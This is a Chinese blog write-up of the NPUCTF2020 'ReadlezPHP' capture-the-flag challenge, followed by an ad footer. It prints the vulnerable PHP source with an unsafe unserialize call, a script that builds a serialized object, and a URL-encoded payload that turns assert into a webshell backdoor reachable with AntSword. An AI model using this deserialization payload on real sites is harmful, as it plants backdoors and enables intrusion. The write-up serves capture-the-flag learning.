[NPUCTF2020]ReadlezPHP 1
打开源代码发现了个./time.php?source
于是打开点进去
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
审计代码:
发现在__destruct()方法里面有 echo $b($a);
这个是php的特性,php可以通过这种方法动态调用方法。
思路很简单,只要把$b赋值为方法名字,吧$a赋值成调用的参数就行了。
我首先考虑的是system结果发现system好像被过滤了,于是自己搭了环境
<?php
highlight_file(__FILE__);
class HelloPhp
{
public $a = 'eval($_POST[1])';
public $b = "assert";
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
// system('dir');
// $b = new HelloPhp;
$c = urlencode(serialize(new HelloPhp));
echo($c);
//O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A15%3A%22eval%28%24_POST%5B1%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D
?>
上述代码可以为自己创建一个后门。
payload:
发现成功了,于是可以用蚁剑连接,但是这个题目用蚁剑连接以后是空白一片,于是考虑可能是在phpinfo()里面
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!